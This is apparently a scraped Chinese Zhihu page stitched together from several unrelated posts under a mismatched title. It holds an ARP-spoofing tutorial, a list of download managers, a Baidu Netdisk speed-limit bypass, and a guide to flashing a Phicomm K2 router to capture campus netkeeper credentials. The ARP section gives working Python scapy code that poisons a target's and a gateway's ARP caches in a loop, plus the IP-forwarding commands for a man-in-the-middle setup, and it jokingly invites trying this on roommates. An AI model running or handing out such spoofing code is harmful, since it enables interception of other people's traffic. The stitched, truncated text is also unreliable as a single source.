斐讯k3 转让有哪些让人耳目一新的创新产品?

&figure&&img src=&https://pic2.zhimg.com/v2-4b646cbecc486fa691b5c_b.jpg& data-rawwidth=&1920& data-rawheight=&800& class=&origin_image zh-lightbox-thumb& width=&1920& data-original=&https://pic2.zhimg.com/v2-4b646cbecc486fa691b5c_r.jpg&&&/figure&&h2&一些同学告诉我说arp欺骗比起普通的icmp攻击要厉害很多,&/h2&&h2&所以今天我做了一篇arp欺骗的教程。&/h2&&blockquote&声明:本教程只能用于攻击自己的手机,电脑,顶多恶搞恶搞室友。弄坏了校网被喝茶处分劝退本人一概不负责!!!:D&/blockquote&&p&在进行ARP欺骗的实验之前,我们有必要了解下ARP和ARP欺骗的原理。&/p&&h2&ARP和ARP欺骗原理&/h2&&blockquote&小明(mmp怎么又是我!?)生活在一个民风淳朴的小镇,这个镇上的每个人都有唯一的IP,而每个人都有一幢或者几幢房子,每幢房子可以用其邮政编码唯一确定(假设),总之,如果你想给小明或者小红或者小华写信,只知道对方的名字是不够的,你还需要知道小明家的邮编(MAC address),可能小明房产太多,指定了某套房专门收信,所以每次你想写信给小明,都需要询问小明的住处。&/blockquote&&p&来看这篇文章的应该是对计算机网络有一定基础的,我就不贴网上一本正经的概念了,简单来说arp的本质就是,你在知道你要给某个ip送包裹,但是你不知道对方的MAC地址,于是你就向内网中广播:谁有xxx的mac address?&/p&&figure&&img src=&https://pic2.zhimg.com/v2-5f7a17f82ca52da8ec251_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1912& data-rawheight=&106& class=&origin_image zh-lightbox-thumb& width=&1912& data-original=&https://pic2.zhimg.com/v2-5f7a17f82ca52da8ec251_r.jpg&&&/figure&&p&比如我们打开&a href=&https://link.zhihu.com/?target=https%3A//www.wireshark.org/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&wireshark&/a&,搜索arp可以看到当前正在进行的arp通信,我的ip称之为57,我想知道146的mac地址,于是我广播道“谁有146?告诉57(我)”,不一会cisco收到了我的询问,他知道问题的答案,于是告诉我说“146在xx:xx:xx:xx:xx:xx(mac addr)&/p&&figure&&img src=&https://pic2.zhimg.com/v2-f75c8cc14f0f22db5dd6e5c_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1890& data-rawheight=&104& class=&origin_image zh-lightbox-thumb& width=&1890& data-original=&https://pic2.zhimg.com/v2-f75c8cc14f0f22db5dd6e5c_r.jpg&&&/figure&&p&反之,内网中有个叫oneplus的家伙(我们称之为91),问道”谁知道57(也就是我)住哪?告诉91“,我收到了他或她或它的询问,心想:看来这里有个傻帽知道我是谁但不知道我住哪。于是回答道“57(我)的mac 地址是xxxxxxxxxx”&/p&&p&&br&&/p&&p&总之,内网的一切就这样很顺利进行着,直到有人动起了歪脑筋。&/p&&p&&br&&/p&&p&接下来我们来瞧瞧arp欺骗是怎么一回事。&/p&&p&&br&&/p&&blockquote&在这个镇上有一家邮局(网关),每个人的信都需要通过它才能发送到世界各地。而小明是邮局的常客了,因为他总是要和心上人小红通信,而每次信件都要通过当地唯一的这家邮局。你也住在这个镇上,愚人节那天,你打算搞点恶作剧。&/blockquote&&p&通常可以把ARP欺骗攻击分为如下两种&/p&&ol&&li&主机型ARP欺骗:欺骗者主机冒充网关设备对其他主机进行欺骗&/li&&li&网关型ARP欺骗:欺骗者主机冒充其他主机对网关设备进行欺骗&/li&&li&主机网关一起骗&/li&&/ol&&figure&&img src=&https://pic1.zhimg.com/v2-0d35b4b86d599f54ea0fbc0b82dfaf6f_b.jpg& data-size=&normal& data-rawwidth=&671& data-rawheight=&246& class=&origin_image zh-lightbox-thumb& width=&671& data-original=&https://pic1.zhimg.com/v2-0d35b4b86d599f54ea0fbc0b82dfaf6f_r.jpg&&&figcaption&图片来源网络&/figcaption&&/figure&&blockquote&你可以选择告诉小明,”嗨,我才是邮局,你把要送的信都送到这儿来吧!“,或者通知邮局:”邮局叔叔你好,我是小明,最近搬家了,把小明的信都送到这个地址吧!“或者两头瞒。&/blockquote&&p&&br&&/p&&h2&万事俱备,就差程序员了&/h2&&p&之前专门为arp攻击写过一篇scapy的安装与使用的文章,这里有一切你需要掌握的用来干坏事的知识-&click here! ↓&/p&&a href=&https://zhuanlan.zhihu.com/p/& data-draft-node=&block& data-draft-type=&link-card& data-image=&https://pic4.zhimg.com/v2-a452f02d2b_180x120.jpg& data-image-width=&1912& data-image-height=&1350& class=&internal&&DeepWeaver:通过摆弄python scapy模块 了解网络模型--Get your hands dirty!&/a&&p&&br&&/p&&p&我们首先需要导入scapy&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&from scapy.all import *
&/code&&/pre&&/div&&p&接下来构造假数据包&/p&&ol&&li&欺骗主机&/li&&/ol&&p&伪造一个arp声明,将网关IP和一个假的物理地址绑定。局域网的其他机器收到信息,就会在访问外网时候去访问那个假的物理地址。&/p&&blockquote&路上你碰见小明,小明气喘吁吁的说:“我现在要给小红寄信但是不记得邮局的地址,现在还要跑过去问”,你不怀好意的笑着说道:“啊,这么巧,我在邮局工作,喏,这就是邮局地址” 你从裤子口袋里掏出一张写着自己家地址的纸片给了小明。小明表示万分感谢,下次一定请你吃饭。&/blockquote&&p&&code&spoof_xiaoming = Ether(src=[你的mac], dst=[小明的mac])/ARP(psrc=小明IP, pdst=网关IP ,hwdst=你的mac, pdst=小明的mac, op=2) &/code& &/p&&p&op取值为1或者2,代表ARP请求或者响应包,这里我们需要伪造一个响应包,所以填2&/p&&p&其余参数在之前的文章里有,这里就不赘述了。&/p&&p& 2.
欺骗网关:&/p&&p&&code&spoof_gateway = Ether(src=[你的MAC], dst=[网关的Mac])/ARP(hwsrc=你的MAC, psrc=小明IP, hwdst=网关MAC, pdst=网关IP地址, op=2)&/code& &/p&&blockquote&你从你的mac地址发送arp回答(op=2)给网关,回复网关:“刚才是您询问小明的mac地址吧,对,我就是小明(因为你伪造了小明的IP),您以后就发给这个mac地址就行了”&/blockquote&&p&首先要开启ip转发功能&/p&&p&&b&Linux:echo 1 & /proc/sys/net/ipv4/ip_forward&/b&&/p&&p&&b&Mac:
sudo sysctl -w net.inet.ip.forwarding=1&/b&&/p&&div class=&highlight&&&pre&&code class=&language-python3&&&span&&/span&&span class=&n&&my_mac&/span& &span class=&o&&=&/span& &span class=&s1&&'xx:xx:xx:xx...'&/span&
&span class=&n&&target_ip&/span& &span class=&o&&=&/span& &span class=&s1&&'172.20...'&/span&
&span class=&n&&target_mac&/span& &span class=&o&&=&/span& &span class=&n&&getmacbyip&/span&&span class=&p&&(&/span&&span class=&n&&target_ip&/span&&span class=&p&&)&/span&
&span class=&n&&gateway_ip&/span& &span class=&o&&=&/span& &span class=&s1&&'172.20...'&/span&
&span class=&n&&interface&/span& &span class=&o&&=&/span& &span class=&s1&&'en0'&/span&
&span class=&n&&gateway_mac&/span& &span class=&o&&=&/span& &span class=&n&&getmacbyip&/span&&span class=&p&&(&/span&&span class=&n&&gateway_ip&/span&&span class=&p&&)&/span&
&span class=&n&&pkt1&/span& &span class=&o&&=&/span& &span class=&n&&Ether&/span&&span class=&p&&(&/span&&span class=&n&&src&/span&&span class=&o&&=&/span&&span class=&n&&my_mac&/span&&span class=&p&&,&/span& &span class=&n&&dst&/span&&span class=&o&&=&/span&&span class=&n&&target_mac&/span&&span class=&p&&)&/span& &span class=&o&&/&/span& &span class=&n&&ARP&/span&&span class=&p&&(&/span&&span class=&n&&hwsrc&/span&&span class=&o&&=&/span&&span class=&n&&my_mac&/span&&span class=&p&&,&/span& &span class=&n&&psrc&/span&&span class=&o&&=&/span&&span class=&n&&gateway_ip&/span&&span class=&p&&,&/span& &span class=&n&&hwdst&/span&&span class=&o&&=&/span&&span class=&n&&target_mac&/span&&span class=&p&&,&/span& &span class=&n&&pdst&/span&&span class=&o&&=&/span&&span class=&n&&target_ip&/span&&span class=&p&&,&/span& &span class=&n&&op&/span&&span class=&o&&=&/span&&span class=&mi&&2&/span&&span class=&p&&)&/span&
&span class=&n&&pkt2&/span& &span class=&o&&=&/span& &span class=&n&&Ether&/span&&span class=&p&&(&/span&&span class=&n&&src&/span&&span class=&o&&=&/span&&span class=&n&&my_mac&/span&&span class=&p&&,&/span& &span class=&n&&dst&/span&&span class=&o&&=&/span&&span class=&n&&gateway_mac&/span&&span class=&p&&)&/span& &span class=&o&&/&/span& &span class=&n&&ARP&/span&&span class=&p&&(&/span&&span class=&n&&hwsrc&/span&&span class=&o&&=&/span&&span class=&n&&my_mac&/span&&span class=&p&&,&/span& &span class=&n&&psrc&/span&&span class=&o&&=&/span&&span class=&n&&target_ip&/span&&span class=&p&&,&/span& &span class=&n&&hwdst&/span&&span class=&o&&=&/span&&span class=&n&&gateway_mac&/span&&span class=&p&&,&/span& &span class=&n&&pdst&/span&&span class=&o&&=&/span&&span class=&n&&gateway_ip&/span&&span class=&p&&,&/span& &span class=&n&&op&/span&&span class=&o&&=&/span&&span class=&mi&&2&/span&&span class=&p&&)&/span&
&span class=&n&&pkt1&/span&&span class=&o&&.&/span&&span class=&n&&show&/span&&span class=&p&&()&/span&
&span class=&n&&pkt2&/span&&span class=&o&&.&/span&&span class=&n&&show&/span&&span class=&p&&()&/span&
&span class=&n&&ans&/span& &span class=&o&&=&/span& &span class=&nb&&input&/span&&span class=&p&&(&/span&&span class=&s1&&'spoof gateway(g) or target(t) or not(n)?'&/span&&span class=&p&&)&/span& &span class=&c1&&# python3 only&/span&
&span class=&c1&&# raw_input for python2&/span&
&span class=&k&&if&/span& &span class=&n&&ans&/span& &span class=&o&&==&/span& &span class=&s1&&'n'&/span&&span class=&p&&:&/span&
&span class=&n&&sys&/span&&span class=&o&&.&/span&&span class=&n&&exit&/span&&span class=&p&&(&/span&&span class=&mi&&0&/span&&span class=&p&&)&/span&
&span class=&k&&while&/span& &span class=&kc&&True&/span&&span class=&p&&:&/span&
&span class=&k&&if&/span& &span class=&n&&ans&/span& &span class=&o&&==&/span& &span class=&s1&&'g'&/span&&span class=&p&&:&/span&
&span class=&n&&sendp&/span&&span class=&p&&(&/span&&span class=&n&&pkt1&/span&&span class=&p&&,&/span& &span class=&n&&inter&/span&&span class=&o&&=&/span&&span class=&mi&&1&/span&&span class=&p&&,&/span& &span class=&n&&iface&/span&&span class=&o&&=&/span&&span class=&n&&interface&/span&&span class=&p&&)&/span&
&span class=&k&&if&/span& &span class=&n&&ans&/span& &span class=&o&&==&/span& &span class=&s1&&'t'&/span&&span class=&p&&:&/span&
&span class=&n&&sendp&/span&&span class=&p&&(&/span&&span class=&n&&pkt2&/span&&span class=&p&&,&/span& &span class=&n&&inter&/span&&span class=&o&&=&/span&&span class=&mi&&1&/span&&span class=&p&&,&/span& &span class=&n&&iface&/span&&span class=&o&&=&/span&&span class=&n&&interface&/span&&span class=&p&&)&/span&
&/code&&/pre&&/div&&p&&br&&/p&&p&&br&&/p&&blockquote&以上只是大致的介绍,具体使用建议用现成的软件,比如kali里的arpspoof软件。用网上的python脚本测试手机并不成功。&/blockquote&&p&&/p&&p&&/p&&p&&/p&&p&&/p&&p&&/p&&p&&/p&
一些同学告诉我说arp欺骗比起普通的icmp攻击要厉害很多,所以今天我做了一篇arp欺骗的教程。声明:本教程只能用于攻击自己的手机,电脑,顶多恶搞恶搞室友。弄坏了校网被喝茶处分劝退本人一概不负责!!!:D在进行ARP欺骗的实验之前,我们有必要了解下ARP和…
&figure&&img src=&https://pic2.zhimg.com/v2-37accd2c93c560e_b.jpg& data-rawwidth=&1920& data-rawheight=&1080& class=&origin_image zh-lightbox-thumb& width=&1920& data-original=&https://pic2.zhimg.com/v2-37accd2c93c560e_r.jpg&&&/figure&&p&&/p&&a class=&video-box& href=&https://link.zhihu.com/?target=https%3A//www.zhihu.com/video/868928& target=&_blank& data-video-id=&& data-video-playable=&true& data-name=&& data-poster=&https://pic3.zhimg.com/80/v2-ed32bec47ba_b.jpg& data-lens-id=&868928&&
&img class=&thumbnail& src=&https://pic3.zhimg.com/80/v2-ed32bec47ba_b.jpg&&&span class=&content&&
&span class=&title&&&span class=&z-ico-extern-gray&&&/span&&span class=&z-ico-extern-blue&&&/span&&/span&
&span class=&url&&&span class=&z-ico-video&&&/span&https://www.zhihu.com/video/868928&/span&
&p&&/p&&h2&&b&NO.1
IDM_&/b&( Internet Download Manager )&/h2&&p&&br&&/p&&p&当你的 Windows 有 IDM 相伴,可以说很多下载功能都如鱼得水,比如网站的某个视频、音乐,一般情况下,它可以自动帮你嗅探,你只需要一键点击,即可迅速下载。另外,它本身支持计划任务、队列下载、站点抓取等各种操作。唯一不足的地方在于,它本身并不支持 ed2k 链接和 bt 种子下载。这款软件正版的话,一台电脑的使用权在 25 美元左右,不过现状是,破解版泛滥。&/p&&p&&br&&/p&&h2&&b&NO.2
FDM_&/b&( Free Download Manager )&/h2&&p&&br&&/p&&p&FDM 是一款完全免费的下载软件,支持 bt 种子和磁力链接等等。另外,相比 IDM ,它对电脑更加友好温和,当然,不同下载器和不同浏览器的兼容也不同,比如如果你在火狐浏览器上使用 IDM ,可能会出现卡顿,但在谷歌浏览器上,似乎 IDM 的表现又好一些。&/p&&p&&br&&/p&&p&&br&&/p&&h2&&b&NO.3
PDM_&/b&( Persepolis Download Manager)&/h2&&p&&br&&/p&&p&轻量、高速的 PDM 下载软件同样支持 bt 种子,但和其他工具不同的是,这款工具封装了 轻量、高速的 PDM 下载软件同样支持 bt 种子,但和其他工具不同的是,这款工具封装了 Aria2 为内核。牛逼哄哄的极客们和技术爱好者们经常使用这种名为 Aria2 的命令下载工具,功能很棒,但是只能用命令,所以普罗大众们就望而却步了。而 PDM 就解决了这个问题。它完全开源免费,并且支持谷歌、火狐等多种浏览器。&/p&&p&&br&&/p&&h2&&b&NO.4
qBittorrent_&/b&&/h2&&p&&br&&/p&&p&qBittorrent 是一款免费开源的 bt 种子下载软件,当然也支持 torrent 和 magnet 磁力链接,你可以为它限速、设置下载完成自动关机等等,如果你有很多种子需要下载,并且,使用频繁,那它就是个不错的选择,而且它支持远程控制。在外工作或闲逛的你可以通过网页端或者专用 APP,控制家里的电脑下个电影,回家时就可以看了。本来还有一个叫做 μTorrent 的下载器,需要20美刀左右才能订阅它的全部功能。 qBittorrent 的出现,怕是要搞死人家的节奏。&/p&&p&&br&&/p&&p&&b&题外话,度娘的百度云其实也是支持种子解析的。把你需要的种子保存在云盘,双击666,几秒钟后,即可轻松在线观看,或者下载。&/b&&/p&&p&&br&&/p&&h2&&b&NO.5
DTA_&/b&( Download Them All )&/h2&&p&&br&&/p&&p&DTA 并非一款独立软件,而是一个只存在于火狐浏览器的插件,如果你是火狐的忠实拥趸,并且偏爱批量下载,便可以使用这款软件。 Download Them All 顾名思义,它可以让你下载网站上你想要的任何东西。而且,你可以通过下载过滤器,指定你所需要下载的文件类型等等。&/p&&p&&br&&/p&&p&然而近期出现和最新版本浏览器不兼容的情况,这种情况下,你可以暂时下载稍微旧版本的火狐。&/p&&p&&br&&/p&&p&&br&&/p&&p&&b&最后,在我们的官网:&a href=&https://link.zhihu.com/?target=http%3A//topbook.cc& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&topbook.cc&/a& 搜索【下载器】或在微信公众号:topbook 后台回复【下载器】,获取以上提到的所有下载器资源或链接入口。&/b&&/p&
NO.1 IDM_( Internet Download Manager ) 当你的 Windows 有 IDM 相伴,可以说很多下载功能都如鱼得水,比如网站的某个视频、音乐,一般情况下,它可以自动帮你嗅探,你只需要一键点击,即可迅速下载。另外,它本身支持计划任务、队列下载、站点抓取等各…
&p&依然是首发在微信公众号:不二小段。欢迎关注。&/p&&p&&br&&/p&&p&SVIP们有一句mmp不知道当不当讲。&/p&&p&&br&&/p&&p&百度网盘是大家十分熟悉的一款产品,曾经功能、速度都还算良心,一度十分火爆。后来,经历了8秒教育片和几次限速之后,大家虽然迫不得已还在用,但是怨声载道。不甘心的技术宅们自然不愿掏钱买会员,去享受原本免费的服务,于是出现了各种魔改客户端,或者油猴脚本,配合别的下载器绕过限制或是多线程加速下载。然而官方经常封杀这些手段,导致这些办法也都是游击战性质,都不是长久之计。&/p&&p&&br&&/p&&p&&br&&/p&&figure&&img src=&https://pic4.zhimg.com/v2-224e7d27abf_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&793& data-rawheight=&443& class=&origin_image zh-lightbox-thumb& width=&793& data-original=&https://pic4.zhimg.com/v2-224e7d27abf_r.jpg&&&/figure&&p&&br&&/p&&p&不过今天我发现爱奇艺(其实就是百度)悄摸摸地推出了一款名为「爱奇艺万能播放器」的软件,其内置的下载功能居然不受网盘限速,于是来分享给大家。(据说这功能几个月前就有了,只是不普及,话说回来,说不定普及以后就很快又会被限速……)&/p&&p&&br&&/p&&p&我们随便找一个文件来对网盘客户的和爱奇艺万能播放器作对比。&/p&&p&&br&&/p&&p&播放器下载地址:&a href=&http://link.zhihu.com/?target=https%3A//store.iqiyi.com/web/iqiyi/detail/qisuyingyin.action& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&store.iqiyi.com/web/iqi&/span&&span class=&invisible&&yi/detail/qisuyingyin.action&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&号称纯净安装。而且我的确没发现有什么捆绑…不符合百度的一贯尿性啊。&/p&&p&&br&&/p&&figure&&img src=&https://pic1.zhimg.com/v2-02e63213fdd711a5f91fba8_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1031& data-rawheight=&976& class=&origin_image zh-lightbox-thumb& width=&1031& data-original=&https://pic1.zhimg.com/v2-02e63213fdd711a5f91fba8_r.jpg&&&/figure&&p&&br&&/p&&p&播放器体积很小,只有17M,安装时注意一下格式关联和路径就好。&/p&&p&&br&&/p&&figure&&img src=&https://pic2.zhimg.com/v2-de865936ddcf9f5_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&600& data-rawheight=&409& class=&origin_image zh-lightbox-thumb& width=&600& data-original=&https://pic2.zhimg.com/v2-de865936ddcf9f5_r.jpg&&&/figure&&p&&br&&/p&&p&播放器具体好不好用我还没测试…所以暂时先不关联媒体文件了。&/p&&p&&br&&/p&&figure&&img src=&https://pic3.zhimg.com/v2-3cfbaf59ffbfe_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&865& data-rawheight=&561& class=&origin_image zh-lightbox-thumb& width=&865& data-original=&https://pic3.zhimg.com/v2-3cfbaf59ffbfe_r.jpg&&&/figure&&p&&br&&/p&&p&不知道为什么官网下载的并不是最新版本…要先升级。&/p&&p&升级以后,会发现右上角多了网盘功能。&/p&&p&&br&&/p&&figure&&img src=&https://pic3.zhimg.com/v2-92101fafcdb0d29955ed96_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&866& data-rawheight=&628& class=&origin_image zh-lightbox-thumb& width=&866& data-original=&https://pic3.zhimg.com/v2-92101fafcdb0d29955ed96_r.jpg&&&/figure&&p&&br&&/p&&p&登录自己的网盘就可以用了。&/p&&p&&br&&/p&&p&下面是对比。&/p&&p&普通账户:&/p&&p&&br&&/p&&figure&&img src=&https://pic1.zhimg.com/v2-556f7c5efae98329fff147c9eea97c7c_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&903& data-rawheight=&225& class=&origin_image zh-lightbox-thumb& width=&903& data-original=&https://pic1.zhimg.com/v2-556f7c5efae98329fff147c9eea97c7c_r.jpg&&&/figure&&p&&br&&/p&&p&免费试用会员提速:&/p&&p&&br&&/p&&figure&&img src=&https://pic4.zhimg.com/v2-acbbaf9a35fcf_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&894& data-rawheight=&213& class=&origin_image zh-lightbox-thumb& width=&894& data-original=&https://pic4.zhimg.com/v2-acbbaf9a35fcf_r.jpg&&&/figure&&p&&br&&/p&&p&&br&&/p&&p&接下来就是…爱奇艺万能播放器:&/p&&p&&br&&/p&&figure&&img src=&https://pic4.zhimg.com/v2-4db4bdac6d7f984fadcad07_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&606& data-rawheight=&126& class=&origin_image zh-lightbox-thumb& width=&606& data-original=&https://pic4.zhimg.com/v2-4db4bdac6d7f984fadcad07_r.jpg&&&/figure&&p&换一集试试&/p&&figure&&img src=&https://pic3.zhimg.com/v2-e7bfefb163b91e3a047ba6_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&591& data-rawheight=&120& class=&origin_image zh-lightbox-thumb& width=&591& data-original=&https://pic3.zhimg.com/v2-e7bfefb163b91e3a047ba6_r.jpg&&&/figure&&p&&br&&/p&&p&差不多是跑满带宽的…&/p&&p&&br&&/p&&p&也不知道能用多久…大家且用且珍惜。&/p&&p&如果能一直用下去,也算是百度为数不多的一款良心产品吧。&/p&
依然是首发在微信公众号:不二小段。欢迎关注。 SVIP们有一句mmp不知道当不当讲。 百度网盘是大家十分熟悉的一款产品,曾经功能、速度都还算良心,一度十分火爆。后来,经历了8秒教育片和几次限速之后,大家虽然迫不得已还在用,但是怨声载道。不甘心的技术…
&p&&b&日更新:此方法只要学校不加心跳,就可以一直用!&/b&&/p&&p&之前的方法在netkeeper升级到4.7版本后就不能用了,后来一直没人能够做出好用的固件。这里放一个我自己用的斐讯K2的固件吧,附小白包会教程,不用编程。固件的原理是账号拦截,就是与simple netkeeper类似,但是更好用一些。缺点是如果学校断网断电,那么每天早上起床都需要电脑开机拨号。另外本人只在重庆测试可以使用,外地的小伙伴欢迎尝试。&/p&&p&&b&教程&/b&&/p&&p&&b&需要的文件:&/b&&a href=&//link.zhihu.com/?target=http%3A//pan.baidu.com/s/1i5KgJtV& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&pan.baidu.com/s/1i5KgJt&/span&&span class=&invisible&&V&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&1、首先进入这个界面,如果不会进入就百度“斐讯k2 breed”,教程很多。选文件mt7620_8m.bin,然后点上传,更新完后多等几分钟,然后拔电源重启。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-cb55fc93ce5d94c3b6540_b.jpg& data-rawwidth=&1836& data-rawheight=&1124& class=&origin_image zh-lightbox-thumb& width=&1836& data-original=&https://pic1.zhimg.com/v2-cb55fc93ce5d94c3b6540_r.jpg&&&/figure&&p&&br&&/p&&p&2、如果你不想改Wi-Fi名称和密码,请略过2、3两步。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-902eaaaa3aa0_b.jpg& data-rawwidth=&1946& data-rawheight=&1100& class=&origin_image zh-lightbox-thumb& width=&1946& data-original=&https://pic1.zhimg.com/v2-902eaaaa3aa0_r.jpg&&&/figure&&p&3、&/p&&figure&&img src=&https://pic3.zhimg.com/v2-a6fa4ccb95c9c39dac4aa_b.jpg& data-rawwidth=&2128& data-rawheight=&1256& class=&origin_image zh-lightbox-thumb& width=&2128& data-original=&https://pic3.zhimg.com/v2-a6fa4ccb95c9c39dac4aa_r.jpg&&&/figure&&p&&br&&/p&&figure&&img src=&https://pic2.zhimg.com/v2-ed95df442aed6c6ccc7cb51_b.jpg& data-rawwidth=&2032& data-rawheight=&1394& class=&origin_image zh-lightbox-thumb& width=&2032& data-original=&https://pic2.zhimg.com/v2-ed95df442aed6c6ccc7cb51_r.jpg&&&/figure&&p&&br&&/p&&figure&&img src=&https://pic3.zhimg.com/v2-54cfde1f67bfb52f86e04d5f59bf99e2_b.jpg& data-rawwidth=&2120& data-rawheight=&1318& class=&origin_image zh-lightbox-thumb& width=&2120& data-original=&https://pic3.zhimg.com/v2-54cfde1f67bfb52f86e04d5f59bf99e2_r.jpg&&&/figure&&p&&br&&/p&&p&4、改了Wi-Fi名字密码后,路由器端就不用管了。插入「wan线到学校」和「lan线到电脑」后,电脑上打开netkeeper,输入账号和密码点登录。如果提示登录成功,就是出现一堆广告。。。则表明路由器已经成功拦截到账号和密码,替电脑拨号成功了,这时电脑端就可以退掉netkeeper了。&/p&&p&5、现在可以手机电脑都可以连接Wi-Fi了,只要学校不断网,就可以一直用!&/p&&p&&br&&/p&&p&~~~~~~~~~~~~~~~~~我是分割线~~~~~~~~~~~~~~~~~~&/p&&p&&br&&/p&&p&最近闲来无事,更新一下我现在,号,在寝室用路由器播netkeeper的做法吧。&/p&&p&此方法不需要输入任何代码,完全是点击鼠标就能完成,非常小白的方案,下面以今天刚弄的斐讯k2为例介绍如何刷入padavan系统,其他路由器请自行百度谷歌教程。此固件除了netkeeper,还能加速ps4联机,去优酷视频广告,shado*s0cks等等一切你能想到的一台路由器能有的功能。&/p&&p&需要下载的文件:&a href=&//link.zhihu.com/?target=https%3A//pan.baidu.com/s/1c1XwRRy& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&pan.baidu.com/s/1c1XwRR&/span&&span class=&invisible&&y&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&1、需要有一台能刷入padavan的路由器,比较推荐的是京东上免费的斐讯k2。详细支持列表见此链接:&a href=&//link.zhihu.com/?target=http%3A//www.right.com.cn/forum/thread--1.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&right.com.cn/forum/thre&/span&&span class=&invisible&&ad--1.html&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&padavan长这样:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-4c00126f2efab11d725de7f4f8e1b218_b.png& data-rawwidth=&1900& data-rawheight=&1318& class=&origin_image zh-lightbox-thumb& width=&1900& data-original=&https://pic1.zhimg.com/v2-4c00126f2efab11d725de7f4f8e1b218_r.jpg&&&/figure&&p&支持路由器列表:&/p&&figure&&img src=&https://pic3.zhimg.com/v2-3e1af3ee100e_b.jpg& data-rawwidth=&2060& data-rawheight=&1468& class=&origin_image zh-lightbox-thumb& width=&2060& data-original=&https://pic3.zhimg.com/v2-3e1af3ee100e_r.jpg&&&/figure&&p&2、插上斐讯k2的电源,连接 @PHICOMM_XX 的Wi-Fi,上网方式随便选一个,然后在浏览器输入 p.to 进入路由器后台管理界面。这里要先将路由器系统降级,只有降级才能刷入breed,降级文件选刚才下载好的SW_K2__V22.4.2.8.bin降级,等待路由器重启。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-b03f4940aef0f73dc277ec_b.jpg& data-rawwidth=&2322& data-rawheight=&1484& class=&origin_image zh-lightbox-thumb& width=&2322& data-original=&https://pic1.zhimg.com/v2-b03f4940aef0f73dc277ec_r.jpg&&&/figure&&p&3、降级完成后再进入后台管理界面,下图这里千万不要点确认,不然就又升级到最新系统了。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-970eb8f349e6b7bf63cb36e1ede40ce5_b.jpg& data-rawwidth=&2302& data-rawheight=&896& class=&origin_image zh-lightbox-thumb& width=&2302& data-original=&https://pic2.zhimg.com/v2-970eb8f349e6b7bf63cb36e1ede40ce5_r.jpg&&&/figure&&p&然后刷入breed:选这个 tianbaoha_breed_ssh.dat 文件,然后恢复备份,等待重启。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-f53f79b09bd86d2e182eaf9bcafc44be_b.jpg& data-rawwidth=&1122& data-rawheight=&654& class=&origin_image zh-lightbox-thumb& width=&1122& data-original=&https://pic3.zhimg.com/v2-f53f79b09bd86d2e182eaf9bcafc44be_r.jpg&&&/figure&&p&4、恢复完成后进入后台,后台管理密码变为tianbaoha,如果输入此密码进入后台成功,说明breed已经刷好。然后再刷入padavan系统,找到RT-AC54U-GPIO-1-PSG.4.3.9-099.trx这个文件升级,系统会自动升级重启。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-36b9ac684bfa6d467f3e6fb3ee25b119_b.jpg& data-rawwidth=&2400& data-rawheight=&1444& class=&origin_image zh-lightbox-thumb& width=&2400& data-original=&https://pic2.zhimg.com/v2-36b9ac684bfa6d467f3e6fb3ee25b119_r.jpg&&&/figure&&p&5、路由器重启完成后,点电脑wifi图标,会看到两个叫 PDCN 和 PDCN_5G 的Wi-Fi,点击任意一个,输入密码连接。连接后在浏览器中输入 &a href=&//link.zhihu.com/?target=http%3A//my.router/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&my.router/&/span&&span class=&invisible&&&/span&&/a& 进入管理界面,管理账号为admin,密码也是admin。按照下图输入账号密码,其余设置都不要动,然后记得点击页面最下方&/p&&figure&&img src=&https://pic1.zhimg.com/v2-624ac69c9b8a251a7883c_b.jpg& data-rawwidth=&1424& data-rawheight=&1482& class=&origin_image zh-lightbox-thumb& width=&1424& data-original=&https://pic1.zhimg.com/v2-624ac69c9b8a251a7883c_r.jpg&&&/figure&&p&&br&&/p&&figure&&img src=&https://pic1.zhimg.com/v2-c74d9b4da8b80b0b7b5c_b.jpg& data-rawwidth=&1408& data-rawheight=&1476& class=&origin_image zh-lightbox-thumb& width=&1408& data-original=&https://pic1.zhimg.com/v2-c74d9b4da8b80b0b7b5c_r.jpg&&&/figure&&p&6、然后需要同步路由器时间,因为netkeeper拨号的算法需要路由器时间准确。点击“系统管理”后,直接点击“应用本页面设置”即可。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-2e73e330b9cfa4bb44a4_b.jpg& data-rawwidth=&1836& data-rawheight=&1476& class=&origin_image zh-lightbox-thumb& width=&1836& data-original=&https://pic1.zhimg.com/v2-2e73e330b9cfa4bb44a4_r.jpg&&&/figure&&p&7、下面就可以进行拨号啦,点击“网络地图”,在点击“地球仪图标”,然后点“重新连接”,就会拨号成功,然后就可以愉快的用路由器上网啦!&/p&&figure&&img src=&https://pic3.zhimg.com/v2-e1bef0cfad1fa_b.jpg& data-rawwidth=&1782& data-rawheight=&1272& class=&origin_image zh-lightbox-thumb& width=&1782& 